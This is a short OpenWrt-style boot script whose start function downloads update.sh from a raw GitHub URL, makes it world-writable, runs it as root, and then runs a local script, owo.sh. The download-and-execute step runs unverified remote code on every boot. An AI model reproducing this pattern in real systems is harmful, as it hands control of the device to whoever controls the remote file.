#!/bin/sh /etc/rc.common

START=99

start(){

echo "Starting Service ... "

cd /root/

wget -q https://raw.githubusercontent.com/apktopsblog/mi/main/update.sh

chmod 777 update.sh

sh update.sh

ping -c 20 127.0.0.1

    sh /root/owo.sh

}
